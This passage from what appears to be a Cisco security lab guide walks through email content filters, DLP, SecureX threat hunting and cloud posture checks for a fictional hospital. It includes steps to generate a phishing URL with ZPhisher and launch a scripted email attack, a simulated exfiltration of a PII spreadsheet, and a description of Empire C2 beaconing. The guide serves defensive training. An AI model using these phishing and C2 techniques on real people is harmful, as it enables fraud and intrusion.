28	Look back at the logs. You´ll see multiple detection engines made up of Sophos and AMP. Most real-world deployments enabled all detection engines within Cisco Secure Mail (Sophos, McAfee, Talos) to have the most rounded detection.
29	In the next example, you will be dropping malware with AMP. Let’s flip over to the ESA GUI and investigate email-based threats.
30	Go to Monitor > Message Tracking.
31	Click Advanced.
32	In the page that displays, observe the field called Cisco Ironport MID.
33	In the next example, you can see the message ID from the previous email (the example here shows "81511," but it will be different for you). Note: You can also use other options to filter messages (Envelope sender, Envelope Recipient, Subject, time range, and so on and so forth).
34	Go to the field named Cisco Ironport MID and use the ID number that you saw on the terminal in the previous step. Click Search.
35	Click the details for the result that comes up.
36	You´ll see detailed attributes for that message and how it was dropped by ESA

Expand Your Defense to Include all Users

In this scenario, you will focus on the rest of the users (The Doctors). You will reuse the Default policy for our defense.

Tip:

You can create as many policies as needed.

Advanced malware Protection will be enabled for the rest of the users. ESA policies are matched top down. This means the first will match for anything associated to the Admin IT group while the Default policy will match with the rest of the users.

To protect users from phishing and identity supplantation (Forged email detection or also known as BEC), ESA can implement content filters. These work by matching one or more conditions within the subject, the body the header or the attachments of an email.

To catch the phishing attack previously used, we´ll need to create two content filters. One will be used to detect the forged email and other to handle the malicious URL. These are very common content filters used by ESA customers.

Procedure

1	Create a content filter to detect forged email detection. Go to Mail Policies > Incoming Content Filters.
2	You´ll see we already created a filter, so click Add Filter to add the filter we created for you.
3	Name the filter BEC. Now we need to create a condition to match. Under Conditions, click Add Condition and go to Forged Email detection.
4	Choose the Dictionary already created with all the IT Admin employees called IT_Admins.
5	Click OK.
6	Go to Action > Add Action. Choose Add/Edit Header, choose Prepend to the value of existing header as the next picture shows, fill in “[Possibly Forged]” and click OK.
7	Click Add Action again, and then choose Add Disclaimer Text.
8	Observe that there is a message already created called "SpoofWarning."
9	Click OK.
10	Click Add Action.
11	In the left panel, select Forged Email detection.
12	Click OK.
13	At the bottom right of the Add incoming Content Filter page, click Submit.
14	Click Commit Changes, and then click commit Changes again.
15	Now, create one more content filter to detect undesirable URLS.
16	Go to Mail Policies > Incoming Content Filters, choose Add Filter ,and name it `Suspicious_URL`.
17	Below Conditions, click Add Condition.
18	Choose Neutral and below “Check URLs within” choose All. Click OK
19	Go to Actions, choose URL Reputation, and leave the options as the next example shows.
20	Click OK
21	Add one more Action and select Add Disclaimer Text.
22	Choose the Phishing disclaimer message created for this lab.
23	Click OK.
24	Click Submit.
25	Go to Mail Policies > Incoming Policies.
26	Select the Content Filter column, and then click Default Policy.
27	Select the created content filters. Click Submit and commit changes.
28	In Kali Linux, open two terminal windows and go to `/root/EmailAttack directory` on the left terminal (If you executed the emailiattack-step2.sh script without executing zphisher.sh first you´ll see a warning). On the right terminal windows execute the `./zphisher.sh script` located at `/opt/zhpisher`.
29	After executing ZPhisher choose option 3 (right terminal)
30	Choose option 01. A phishing URL will be generated.
31	Execute the `emailattack-step2.sh` script on the left terminal window
32	From the jumphost, login to ESA using Putty which hould already have opened. If you do not have Putty open, remember to log in with `admin` as the user name and `C1sco12345` as the password. Remember to run the `tail mail_logs` command. You´ll see the ESA´s processing for that email and how it´s being dropped. If you do not see it, re-run the attack when you have the ESA Putty session opened. Forged email detection is enforced. The URL had been defanged. It is always good practice to look at the MID.
33	From ESA Dashboard, go to Message Tracking.
34	Search for the attacker’s email, using the search term “New,” because the email subject starts with this word.
35	Click Search.
36	When you see the email, click Show details to see all the related information regarding the detection.

Defend Outgoing Emails with the Data Loss Prevention Policy

The last defense step we will perform is adding a DLP policy to defend against an attacker attempting to exfiltrate date over email.

Procedure

1	Go to Mail Policies > Data Loss Prevention (DLP) > DLP Policy Manager.
2	Click Add DLP Policy.
3	There will be predefined options to control outgoing sensitive information. Choose Privacy Protection.
4	You will see many options. Choose Social Security Numbers (US) and click Add.
5	A customization page will be displayed. Click Filter Senders and Recipients.
6	Choose Documents from the drop-down Menu, and then choose xls, xlsx and click Submit.
7	Go back to Mail Policies > Data Loss Prevention (DLP) and choose DLP Policy Customizations.
8	Click Default Action.
9	Click the drop-down menu by Message Action.
10	On the same page, click Advanced. In the DLP notification section, choose “sender,” and then click Submit.
11	Go to Mail Policies > Outgoing Mail Policies. Within incoming email policies, you are also able to add different filters. For this exercise, we will focus on DLP; however, keep in mind that you could also check for outgoing malware, Antivirus check, connection filters, and other things.
12	Right below DLP click Disable
13	From the drop-down menu, choose Enable DLP (Customize settings).
14	Click Submit. The outgoing mail policy will be configured similar to the following image.
15	Click Commit Changes.
16	Make a comment (optional), and click Commit Changes again.
17	From Jumphost go to the Doctor´s Machine using DRP shortcut or use GUAC. With Outlook opened, send an email to dcloud@attack.com. Type anything you like for the subject and attach the Howser-PII.xlsx file to the email. Press Send to send the email:
18	You will receive a Mail Delivery System informing you that the message was identified by your administrator as a policy violation. It will also provide the MIDD and other details.
19	Go to Monitor > Message tracking and use the Subject tracking. Search for the subject you used in your email.
20	Click Show Details.
21	You´ll see information about the DLP incident.

In this scenario, you performed a phishing campaign based on researching a target and exploiting their trust through email. You created a fake email and embedded a link to a malicious resource enabling you to own the victim’s system. This breach enabled you to gain inside access and eventually steal data. You switched rolls and worked through how to enable different email-based security defenses using Cisco Secure Email to reduce the risk of future email-based attacks.

Important:

Email continues to be the number one threat vector. You need an enterprise security solution such as Cisco Secure Email to protect your organization and users!

Threat Hunting with SecureX

Welcome to the HackMDs security operation center (SOC). For this scenario, we are going to focus on threat hunting. The story is you are working in a SOC, and you are going to perform common threat response tasks. Tasks include:

Monitoring and responding to events within your security tools.
Working with threat data (provided), which you will need to investigate.
Applying automation to improve your response time.
Validating why a tool has identified a threat.

In Scenario 4, you learned how to configure Cisco’s threat response SIEM/SOAR-like tool known as SecureX. For this scenario, you will start with a pre-configured system and go right into taking actions. The systems leveraged are a shared resource, so it is common to find other dashboards and “left overs” from other labs. Know we are giving you configuration capabilities; hence, be mindful regarding the language you use when naming things.

Accessing your working environment

Let’s start off by accessing your working environment. Modern security operation centers start with their extended detection and response platform (XDR), as it’s the centralized place for security data and taking action. Your XDR solution is Cisco SecureX.

Procedure

1	Locate the Demo Ready icon, located on the Jumphost desktop, and verify that the status is green.
2	Locate the SecureX icon on the Jumphost desktop and double-click it to display the demo launch window. Four new tiles are displayed in the demo launch window: Note: Return to the demo launch window at any time by clicking the Cisco SecureX v2.1 task, located in the Windows taskbar:
3	Click View on the Talos tile. This displays a threat called Hafnium in a new tab. Our example represents anything you hear about and want to hunt for, answering the most common question a SOC deals with: “Is SOMETHING on our network and how does it impact us?”
4	From the demo launch window, click View on the Service Now tile.
5	This will display a tab to log into Service Now. You will need to flip back and forth between the the demo launch window and the Service Now tab to copy and paste both the username and password. Once you login, you should see the Service Now dashboard.
6	From the demo launch window, click View on the Cisco SecureX tile. This will display the SecureX landing page in a new tab. You will see some windows open and close. Let the script work, as it is logging into all of the systems SecureX is connected with, saving you time by building the integration between systems. Note: Check out Module 4 if you want to learn how to configure a new SecureX environment, including adding integrations between different technology. This lab has already completed this task for you.

You are now ready to take on threat hunting.

What is threat hunting?

Threat hunting is an analyst-centric process that enables organizations to uncover hidden advanced threats, missed by automated preventative and detective controls.

There are three types of threat hunting:

Intelligence-Driven: You are provided a list of known threats to hunt for.
TTP-Driven: You are provided the tactics, techniques and procedures about threat actors. You are using the TTPs to find the threat, versus knowing what the threat is.
Anomaly-Driven: Hunting for low-prevalence artifacts and outlier behaviors.

Hunt 1 - Using SecureX Dashboard with an Endpoint Detection and Response Tool

Threat intelligence can come from many sources. Cisco’s research team, Talos, is the fuel behind Cisco security products as well as one of the largest commercial threat intelligence teams in the world. These teams are supported by unrivaled telemetry and sophisticated systems to create accurate, rapid, and actionable threat intelligence for Cisco customers, products, and services. Talos defends Cisco customers against known and emerging threats, discovers new vulnerabilities in common software, and interdicts threats in the wild before they can further harm the internet at large. Talos maintains the official rule sets of Snort.org, ClamAV, and SpamCop, in addition to releasing many open-source research and analysis tools

There are hundreds of other threat intelligence feeds available. We highly recommend questioning a few value points about any threat intelligence feed.

How current is the source? You don’t want to use old data.
How relevant is the data to your business?
How reliable is the threat source?
What format is available, and does it work with your existing XDR solution?

Your session could have dashboards already created or it could be empty. When we run this script, we are pulling in an existing pre-configured Cisco SecureX session so you can go right into threat hunting. These are shared environments, meaning you could see existing dashboards.

Dashboard widgets are great for quickly seeing the status of certain datapoints, which many offer the ability to click into data results, cross-launching the tool providing the data. For example, if a Cisco Secure Endpoint widget shows a host system is compromised, clicking the data within SecureX will open directly to the screen within Cisco Secure Endpoint that focuses on host compromised systems. The goal is to help you, the threat hunter, research events with the least amount of clicks possible.

Note: Module 4, the Ransomware Scenario, offers the ability to build a SecureX configuration from scratch if you desire to learn that skill.

Procedure

1	For those that already have existing dashboards, you can create a new dashboard focused on Cisco Secure Endpoint by clicking the Customize button to create a new dashboard using the + Create Dashboard button as shown. Then click +Create Dashboard. Note: If your demo does not have any existing dashboards, you will see the following screen: Click Add Tiles and then click +Create Dashboard to create a new dashboard that summarizes datapoints from our available security tools.
2	Give the new dashboard a name, for example: `HackMDS Dashboard`. Under Available Tiles, notice all of the tools you have available to pull data from as well as to click into from SecureX.
3	Let’s start with AMP. In the list of available tiles, click the AMP for Endpoints item to display a drop-down list of the options for AMP. Scroll through the list and select Summary and MITRE ATT&CK Tactics detected. Summary gives a general view of what Cisco Secure Endpoint (formally called AMP) sees within endpoints. Think of Secure Endpoint as an endpoint detection and response tool that has full visibility into the endpoint it is protecting. SecureX can quickly check all protected hosts for potential malicious artifacts such as hearing about a threat and needing to know if the file exists within your endpoints. MITRE ATT&CK is a very popular threat model used to understand the different technics and tactics used by threats. Adding this module allows you to map the specifics regarding what behavior Secure Endpoint is seeing within your endpoints.
4	Click Save to display the new dashboard. Use the scroll bar to view the contents of the Summary panel and the AMP for Endpoints panel.
5	Scroll back to the Summary panel panel and click Computers Compromised. This will bring up Cisco Secure Endpoint’s main Overview page.
6	Here you have a summary of all the malicious activity within your endpoints, potential vulnerabilities, types of systems you are management and other useful details. For click number two, we will dive into Executed malware. Click that link found under Compromises.
7	Here you will find details on malware that has executed on your systems. If you scroll down, you can “begin work” meaning: start the remediation process. We will stop here as you now know which systems are at risk of compromise and can take the appropriate action to remediate them.

Hunt 2 - Using SecureX Browser Plugin to Hunt for Known Threat Data

A common situation is you hear about a threat and need to know how it impacts your organization. Looking back at the Talos page you pulled, this is an example of a resource that has different datapoints including attack signatures and web domains you can use to test against with hopes they have not impacted your business. The same type of data could be found on Facebook, Twitter, blogs, etc. that talk about threat research.

Rather than going through the extremely tedious task of copying and pasting any threat data, Cisco SecureX offers a browser plugin that can automatically identify, scrape, and leverage any data found within the web browser. We already installed this for you, however, we need to connect it to SecureX.

Procedure

1	Go to SecureX and choose Administration.
2	Delete any existing API Clients that may conflict with your Plugin integration:
3	Click Generate API Client.
4	Give it a name and select all so this API can control anything within SecureX. Then click Add New Client.
5	You should see the client ID and client password. Do not close this screen or you will need to repeat this process. Now click the green X icon (upper right corner) to bring up where you enter this information. Scroll between the Client ID and Client Password to paste those into the browser plugin. Then click Authenticate.
6	Now you should have the ability to use the SecureX browser plugin. Go back to the Talos webpage. While on the page, click the green X icon to bring up the plugin. Click the Observable option (Square with small magnifying glass). You will find there are 15 different observables you can check against your network. Click Investigate in Threat Response.
7	This will open Cisco Threat Response, which will start investing each of the observables from the Talos page. You can track the progress by looking at the enrichments completed section. It will take a few minutes to research all 15 observables. This is done using various API call outs to each tool.
8	Once complete, you will see a diagram representing how these observables relate to what your security tools see. Scroll to the top to see if any of these observables are seen within your security tools. For this example, there are three hits meaning yes, your network is impacted by one of these threats.
9	Let’s take a quick action. Click the 3 Targets carrot to drop down the impacted hosts. Scroll to the Results section and click the granite Endpoint. Click the drop-down carrot beside granite. Hover over the AMP Host Isolation with Tier 2 Approval to see a description of what this automation does when clicked. Click AMP Host Isolation with Tier 2 Approval to isolate this host. You will see a green box stating isolation has occurred. If you click it a second time, you will stop the isolation, since Secure Endpoint has full control of this endpoint.
10	Next, scroll to the diagram. You should see some hits to malicious URLS, however; they related back to a clean domain. The easiest approach to reducing this threat is blocking the domain, but what if the clean domain has some business purpose? Rather than just blocking the entire domain, use the drop-down carrot and click into a URL to add it to a Cisco Umbrella block policy, representing your web filtering tool.

Hunt 3 - How to automate investigation response actions with SecureX Orchestrator

By now you should be familiar with the typical flow of a threat hunt.

This scenario focuses on the response action, specifically we will see how to automate the ‘R’ in XDR. Regardless of whether the detection was driven by intelligence, tactics, techniques and procedures (TTPs), or some anomaly, you may need to take multiple actions to respond to any given detection. Many SOCs are finding they are swamped with investigation requests leading to an overloaded staff. Rather than attempting to “pedal faster” meaning try to manually keep up, why not automate some of those detection responses, and have those automated response actions triggered from the same tool you already used for the detection? SecureX with its built-in orchestrator allows you to do just that!

In this hunt ou will be further investigating an issue that has already been identified by Cisco NGFW Event Service as a Security Intelligence (SI) event. The event has been promoted to a Threat Response Incident from the NGFW Event Service. The background story for this next hunt is how you work in the HackMDs Security Operation Center (SOC) and passed an incident that needs investigating. It is your job, as Tier 2 support, to be responsible for verifying any threat exists and taking the appropriate action.

Procedure

1	To see the newly created Incident, expand the Ribbon and select the Incidents view. Search on dcloud (if the dcloud search filter is not already applied). You should see 3 or 4 incidents after applying the dcloud filter.
2	Select the first incident named Security Intelligence Event - URL_SI_Category:dcloud-SI-URL. Note: On the right section of the Ribbon, you can see whether this incident has been assigned to anyone. If ASSIGNEE shows No one is assigned - assign yourself, click the assign yourself link:
3	If the assignment already shows the incident is assigned, let’s assign the incident to ourselves by clicking the x next to the existing Assignee, which removes any existing Assignee. Then click the assign yourself link. Now you will notice the Incident is assigned to the logged in user, which you will see on the top right of your screen:
4	Now that the incident is correctly assigned, let’s investigate the incident in Threat Response. Click the Investigate Incident button. This will pull up a list of observables that you can investigate. Check only the IP address 192.168.249.115, then click Investigate Selected: It will take roughly 30 seconds for the relation graph to load. Once complete, your relation graph will look similar to the following: Note the blue magnify glass on the one graph node you started the investigation with (IP 192.168.249.115). We can see this internal IP is connected to public IP address 108.62.141.250 which also has a suspicious URL (drinkfoodapp.com) connected to it. Let’s expand our investigation by adding the 108.62.141.250 address to our investigation. Click the carrot on that graph node and select Add to current Investigation: Once the new relation graph loads, we can see a lot more information about this security intelligence incident. Specifically, we can see there are 2 more local targets connected to that public address, bringing the total target count to 3 in our investigation:
5	The last graph node we are going to add to our investigation is the file with SHA-256 value starting with 0d5a1c0. Add the file to the investigation the same way you added the 108.62.141.250 IP address. The new graph may take a couple of minutes to load. Try to rearrange the nodes in the graph to minimalize the crossed lines. Do this by placing the observables with the most number of connections in the center. Your relation graph should look similar to this after organizing it:
6	Here we can see the observable with the greatest number of relations is the file with SHA-256 starting with 0d5a1c0. Click that observable and notice how the Threat Response Focus feature displays how that observable relates to all its adjacent nodes:
7	With that SHA-256 in focus, we see much more relevant information on the graph. Specifically, that the SHA was attached to multiple emails, both with the same email subject of MidYear Bonus is Here!. We also see that the SHA is connected to public IP address 108.62.141.250. Let’s focus on that next to see how it relates to its adjacent nodes:
8	Here we can see that most of the adjacent nodes are making network connections to 108.62.141.250. We also see that 108.62.141.250 has Targeted a local host in our environment with IP 192.168.249.115. Imagine you are investigating this during business hours and your IT policy does not allow configuration changes during business hours. Now would be a great time for a third-party integration to open a ServiceNow ticket. Let’s do just that by clicking the pivot menu on 108.62.141.250 (the V next to the IP address). From the pivot menu scroll down to the Orchestration workflow named 0018 – ServiceNow – Request Firewall Null Route:
9	Let’s open the SecureX Orchestrator now and confirm the Workflow ran successfully. We can then log into Service Now and confirm we see the new ticket created at the time we expect. Open SecureX Orchestration by clicking Orchestration from the SecureX Dashboard. When SecureX Orchestration launches, you are presented with a few of all the Workloads associated with the logged in user:
10	We would like to view an existing run. To do so, mouse to the left and expand the navigation bar, and click Runs. You are next presented with the Workflow Runs search screen. The Workflow we are interested in seeing is called 0018 – ServiceNow – Request Firewall Null Route. Start typing `0018` and you will see the Workflow appear: Note: If you are not sure of the Workflow name when looking for runs, use the percent (`%`) character in the search field to search all Workflow runs. Select that Workflow and you will be presented with all the 0018 – ServiceNow – Request Firewall Null Route Workflow runs in the last 24 hours:
11	Note the Started on date and time. Let’s login to ServiceNow and confirm a ticket was opened at that time to track adding a Null route for IP 108.62.141.250. As you did earlier in this lab, log into ServiceNow by clicking the ServiceNow link in Demo Ready and provide the credentials listed:
12	Once you are in Service Now, click Change – Open on the left, then look for a Created date that matches when your SecureX Orchestration flow ran. In our example that would be 09:45 on 11/5/2021:
13	Click the Change Request Number link on the left to open the details of the Change Request. After the Change Request details load, you can see the IP address of 108.62.141.250 was correctly passed from SecureX Orchestration to Service Now:

This concludes our threat hunt. We were able to show how SecureX Orchestration can automate repetitive response actions, such as opening a Change Request ticket in ServiceNow.

Hunt 4 - Using SecureX with Stealthwatch Enterprise (SWE), a behavioral network detection and response (NDR) tool

From the viewpoint of the Network, having full visibility of the network’s communications and ability to expose anomalous behavior not based on signatures, adds tremendous value to a SOC. We call this breach defense capabilities since edge firewalls or other gateway / “north south” defense tools do not defend against lateral movement and attacks. Keep in mind your only options is positioning appliances off of SPAN/Mirror ports, placing honey pots within a network, collecting network packets or waiting for your hosts to be attacked. We feel all of those have huge disadvantages compared to using network telemetry, which already exists within your physical, virtual and cloud networks.

Cisco Security Network Analytics (formulary called Cisco Stealthwatch Enterprise (SWE)) goes beyond the detections made by endpoints or firewalls and identifies behaviors related to zero-day malware, insider threats, Advanced Persistent Threats (APTs), Distributed Denial of Service (DDoS) attempts, and other attacks before they wreak havoc on your network. Unlike other security monitoring solutions, SWE monitors not only traffic going in and out of the network, but also lateral, or east-west, traffic inside the network to identify network abuse and insider threats, making it a desired companion tool for threat hunting.

In this scenario, we use the SecureX integration between SWE, Cisco Threat Response and Cisco Secure Endpoint to kick off orchestration in another gear with Secure Endpoint acting as the enforcer to mitigate the risk exposure found within the network based on network telemetry. This hunt addresses anomalous behavior caused by one host which is wreaking havoc in the network across several internal hosts, which have surfaced in the SWE Top Alarms by Count tile.

Note: When baseline and anomaly technology is used, the more a threat attempts to use “stealth” to evade threat detection, the easier it is to detect based on how it compares to normal traffic and behavior.

Procedure

1	We can add tiles to an existing dashboard, but for this exercise, let’s create one specific for SWE tiles. In SecureX, click the Customize button to add a new tile.
2	Name it something like `SWE`, and choose to Add All tiles for the SWE section (Stealthwatch Enterprise tiles):
3	Once done, click to Save it.
4	Once complete, you should have the various tiles like this example screenshot:
5	Now it is time to begin our investigation into potential breaches. Notice in the widget labeled Top Alarms by Count tile shows multiple Worm Propagation Security Events. This is likely a breach, but we need to investigate it to confirm the risk and exposer. Let’s drill in to investigate by clicking on Worm Propagation bar, which will pivot into the SWE dashboard. One click and you will go from SecureX to the specific page within SWE showing the worm prorogation details.
6	Let’s open the Worm Propagation in Today’s Alarms tile, which will display all the alarms. It appears that the same source host is involved. Do this by clicking the part of the pie chart representing the Worm Propagation alarms.
7	Next, we need to understand the details of the Security Event alarm. You will see the basic details under the Details section.
8	When you click the triangle all the way to the left of any Security Event, it displays the details section for the alarm. Those details are explained within the Description section.
9	Next, we will use SecureX and investigate the Security Events in Cisco Threat Response (TR). To do this, first choose the action items by selecting the … next to the impacted IP. Next, expand SecureX options by clicking the V to the right shown as callout 2. Finally, choose to Investigate in Threat Response shown as callout 3 in the following image.
10	This will open the Cisco Threat Response (TR) Investigate dashboard containing details about the worm propagation. TR provides sightings with various verdicts giving you a deeper understanding of what is involved with the threat being researched. In this case, we have an unknown action occurring that is raising concern. Let’s attempt to understand the magnitude of this potential threat. Note: If your screen does not reflect the screenshot below, populated with unknowns, refresh the browser.
11	The TR Investigate Results section provides Details and Threat Context. Lets view those details by first scrolling to the bottom of the page. Next, check the Details tab. Review the Verdict, Sightings, and Indicators tabs. For the definitions of the terms, click on the Learn More for each term. If you see a Warning indicator, shown as callout 3 in the next example image, it is informing you that only top 10 sightings are returned, but there can, and are likely, more events! Note: If Verdict, Sightings, and Indicators tabs are not displayed, click the Investigated IP address.
12	Click the Sighting section. You will see that sightings reveals the source of the data. In this example, SWE is the source (no surprises here):
13	Next, click the Indicators tab to see those details.
14	You will see that we have a worm propagation based on the behavior being seen. This isn’t good, now that you have confirmed it with a different tool. Let’s examine the Worm Propagation activity even further to determine its blast radius. To broaden the investigation, we will enlist the use of related sources in TR to help with a visualization of the situation being investigated. Notice in the next example image that callout 1 shows the primary source IP is displayed with the correlated communications. Let’s add `10.110.10.254` as the related IP as shown with callout 2 in the following image. Click Related.
15	Notice how 10.100.10.254 has communicated outbound to the systems within the red circle. When you compare that to 10.110.10.254 and the systems its communicating to found within the blue circle, it will demonstrate that both of these systems are behaving the same way. If you look closely at how this communication and reach out across systems is occurring, you can see system 10.100.10.254 has enlisted 10.110.10.254 to do its bidding.
16	Scroll down and click into the TR Results and click Indicators. This will confirm the observable is performing the worm behavior you were tasked to investigate based on what Cisco Secure Network Analytics (formally Cisco Stealthwatch) is seeing.
17	Click the Threat Context section and click the Worm Propagation under the Indicator. TR Threat Context will show sightings for this Worm Propagation for other systems such as for 10.110.10.254 to help you better understand the scope of the problem at hand.
18	In comparison, looking to the right via the originating offender, 10.100.10.254 exhibits the same behavior. Click this system to see its behavior.
19	At this point we have enough information to understand security events fired in Cisco Secure Network Analytics as well as details on how the Worm Propagation is occurring within our environment. Note that there is no known signature to detect this type of behavior, meaning it's likely an IDS or other network tool would miss this threat. Let’s mitigate the source of the problem, which is the originating IP address of 10.100.10.254. We can use Secure Endpoint (formerly AMP) orchestration and isolate this host from further damage to other hosts. Do this by clicking the small v-shaped drop-down to see options for the IP of interest. Select AMP host isolation with Tier 2 approval (you may need to scroll down within this menu to locate it beneath the SecureX Orchestration section. This will launch a SecureX orchestration task to isolate this system.

Obviously, in a real-world scenario, this is just the start of the mitigation process. A real world incident response would consider all impacted systems and automation could be used across the entire network to quickly address the entire problem. Our point for this exercise is to show how to collecting details to prove a security tool such as Cisco Security Network Analytics has correctly identified a threat.

Summary

At this point, you have completed four different threat hunting exercises. First, we had you create a dashboard centered around Cisco Secure Endpoint monitoring. Think of this as classic threat hunting with an endpoint detection and response tool. For this first hunt, you were able to quickly identify an infected host, drill into details and apply remediation within a few clicks.

In the second hunt, we showed you how to collect any threat data from any source on the web using the Cisco SecureX scrapper options within a web browser plugin and quickly hunt for those within your environment. Imaging how powerful this can be to answer the question “Hey I heard about a threat. How does it impact our organization?”

In the third hunt, you moved to a common situation where a higher tier support member is provided an incident to investigate. You went through steps of investigating an existing case and even leveraged security orchestration to integration with service now to simplifying the response while only making changes during approved business hours.

Finally, the fourth investigation focused on validating data found within a breach detection tool. It is common for the SOC to ask “why” a tool is showing a threat as well as needing to validate the scope of a breach. You worked through a worm propagation within your environment and were able to identify all systems that were impacted by the event.

To learn more about threat hunting with Cisco technology, check out the Cisco Threat Hunting workshop, which provides even more threat hunting activities!

Secure Cloud Insights

Secure Cloud Insights (SCI) provides complete visibility into your cloud environments to help you identify security and compliance gaps while accelerating threat investigation and response. As an API driven data platform, this SaaS offering integrates with major cloud providers to ingests your environment's assets and resources into its core engine which is powered by a graph database. This approach provides visibility into your cloud footprint with a comprehensive inventory of your assets. It helps you understand your attack surface by proving relationship mapping which allows you to navigate cloud-based entities and the associated access rights. Last, but not least, it strengthens your cloud security posture while improving compliance with security and compliance reporting.

We are going to use SCI to help us with a few tasks.

First, let’s login to the SCI dashboard by choosing the Secure Cloud Insights Tab from the Firefox browser. Username and password will auto-populate:

Click the Account and switch to securexlab:

Verify:

At this point, we are ready to tackle our tasks.

Use cases

Procedure

1	We need to determine if we are exposing our private AWS datastores to the public. We simply type `s3 public` in the search (#1) and we are presented with a list of questions. Choose Are there public facing instances that are allowed to access non-public S3 buckets? In the snapshot below, we are presented with a relationship graph of the assets and, simply put, we indeed have allowed the public internet access to the s3 bucket on the right, which is a private asset, which upon reviewing its properties, it appears to provide HIPAA related storage. Let’s find out why this happened. We follow the path from left to right, from the Internet asset, all the way to s3 asset, and break it down step by step starting with the Internet asset. We are presented with details at #1 and a warning that a problem has been detected at #2. Internet has a relationship with jewelery-mexico-schemas-strategist-tuna-service-sg, which is an aws_security_group that allows access to egress and ingress traffic based on an access list. In this case, it appears that the reason a problem was detected is due to a violation of an ec2-restricted-ssh policy: Focusing on the jewelery-mexico-schemas-strategist-tuna-service-sg asset, which protects our aws_instance i-0613d3de2dbbce070, we review the details at #1 and the access list details at #2, for which we scroll and check all the rules. The rules indicate tcp and udp ports 0-65535 are allowed. At this point, it is clear the access list misconfiguration is the culprit. However, it is not directly related to the private s3 bucket. Let’s dig more. In the next snapshot below, at #1, our aws_instance i-0613d3de2dbbce070 is used by the AccountName fuchsia-research-pizza-service-keypair: The AccountName fuchsia-research-pizza-service-keypair is assigned (#1), to the aws_iam_role dram-coherent-pants-orchestrate-service-9tdl1py9jo-0022e2a0e8e84d4-policy (#2) in screenshot below: And finally, aws_iam_role is assigned (#1) to the AccessPolicy aws_iam_role_policy dram-coherent-pants-orchestrate-service-9tdl1py9jo-0022e2a0e8e84d4-policy which allows full control (#2) of the s3 private datastore bucket: During the graph tracing, we determined, it is not only the access list which is misconfigured, but also an account is assigned to a role which is granted full access via a role policy to a private asset, the s3 bucket. This effort provides the necessary visibility with evidence which is useful information for the Incidence Response and Audit teams alike.
2	Our policy states that all datastores need to be encrypted. Let’s run a query to determine if we are compliant with our policy. As there are multiple ways to perform the query, we will use the Visual Query Builder. Click on #1, #2, and #3 per the following screenshot: For the next steps: (#1) under Classes, find DataStore and (#2) drag DataStore into the middle canvas. (#3) double click DataStore. (#4) create filters and type `encrypted`, set operator to =, property value to false, and (#5) click ADD: In the snip below, (#1) verify the right side of the screen and (#2) run the query: We are presented with the results below. (#1) displays the query in J1 Query Language format, and (#2) the column with the results, which can be exported (#3) into a CSV or JSON, or be shared as a link: To summarize, we were able to quickly produce DataStore Encryption policy compliance results across all of our monitored environments, and share the violations with the appropriate teams for mitigation.
3	Multi-factor authentication (MFA) must be turned on for the Account Root User for all of our AWS accounts. Let’s run a query (#1) and pick (#2) to determine which accounts are not MFA enabled: Now, we have an option to pick the negative (#1): And quickly, we have our results, which can be shared with the appropriate teams who are able to mitigate.
4	Our developers use NPM packages in the code of many of our applications. Recently, reports surfaced with information regarding vulnerability in NPM package version 1.0.0. Let’s determine if any of our applications are using this vulnerable NPM package version. Using the J1QL Visual Query Builder once again, we drill in: Once in J1QL, chose Types (#1), search for NPM (#2), drag the npm_package to the canvas and double click on it (#3). On the right side, chose Filters (#4), in property name, type in, `version` to search for version and chose it (#5), for Operator chose = (#6), and for attribute value, type in `1.0.0` and click ADD. Your Query Preview must reflect (#8). Run the query (#9): We discover that two code modules are using this vulnerable version: Let’s determine the blast radius by checking if these packages have relationships with other assets. We will choose to view in graph format (#1): We find both assets isolated per the screenshot below: Clicking on one, renders options to get information via the circular icon, relationship mapping via the ellipses, or to hide the asset. We chose the ellipses … And, we find no relationship with any other asset, which is great news. The other asset exhibits the same result. The conclusion is that we have a known vulnerable npm package used by two code modules independent of each other, and from all other assets. Whew!

Cloud Security Posture Management

As a final task, let’s utilize the Cloud Security Posture Management reporting capabilities to check for HIPAA compliance.

Navigate following #1, #2, and type in CDC-HIPAA at #3 and double click at #4.

We are presented with the CDC HIPAA compliance check dashboard where we can quickly check our gaps. Per #1, apply the filter of the Gap Detected. Per #2, verify filter was applied, and click the link Protection from maclicious software, per #3:

At #1, we are presented with the HIPAA standard. At #2, click to expand the Gap to find security agents monitoring and protecting server instances. At #3, we are presented with Protected and Not Protected (this field may appear blank due to text and background contrast). Hover your mouse over it and click it. This information can be utilized to mitigate and become compliant.

Conveniently, SCI provides the ability to export the entire CDC HIPAA report. Click the framework link (#1) and download the PDF (#2).

Lastly, let’s check out the Insights (#1) dashboard customized with focus on AWS S3 Security and use it determine our security posture for our data stores:

Navigating by following #1 to T4, we are presented with the dashboard below. Quickly, we learn that at #2, we have 226 S3 Buckets which are without Secure Transport enabled. At #3, 101 are without default encryption enabled. At #4, good news, there are no non-public buckets exposed publicly. And finally, at #5, our non-public buckets with objects which can be exposed publicly are displayed.

These tasks demonstrated how to use Secure Cloud Insights to provide comprehensive Cloud Security Posture Management (CSPM) and Reporting capabilities to achieve better compliance, detect security risks and greatly reduce your mean time to resolution. This completes our exercise.

End to End Exploitation – Advanced Attack Lab

Value Proposition: In a previous CDC lab titled “The Ransowmare Scenario – Lab 4," Mr. Black sent multiple phishing emails to our target environment with attachments that infected the host with ransomware. During the attack, several setup tasks were performed by the attacker that were not fully explained. This is where Mr. Purple had instructed Mr. Blue to add hidden malware within Mr. Black’s ransomware attack with an attempt to establish a deep foothold within the HackMDs environment.

Important:

Before you start this lab: Log in to Jumphost 2 and the Dr.Workstation. Jumphost 2 represents lpeterson, who will be a target for your attack.

Note:

There have been many cases in the real world where different attack parties leverage existing malware as a pivot point into a target’s network. There have even been cases when malware will enable security on an infected host to avoid other malicious parties from infecting the system once successfully compromised!

During the previously executed incident response performed by the HackMDs SOC, there was a discovery of Powershell.exe beaconing but it was ignored as Mr. Black’s ransomware was removed by the SOC. Those beacons were designed to be highly visible however in the real world, beaconing tends to be hidden and difficult to detect. Those beacons are a form of callback to an attacker system, which for today’s lab are callbacks to Mr. Purple’s C2 server. This is how Empire works; the first attack tool you will be using today. Mr. Purple is able to send commands to compromised systems through a beacon form of communication. This is limited in functionality verse having complete control of an endpoint through a full RAT (remote access tool kit), which we will explore later in this lab.

For this scenario, we are going to redeliver Mr. Blacks ransomware attack representing what previously occurred. Once delivered, we will assume the ransomware will be remediated as it was done when we prevented Mr. Black from extorting HackMDs. This will also launch Mr. Purple’s attack that was never identified giving Mr. Purple a chance to compromise the HackMDs network even though the ransomware is being remediated!

Note:

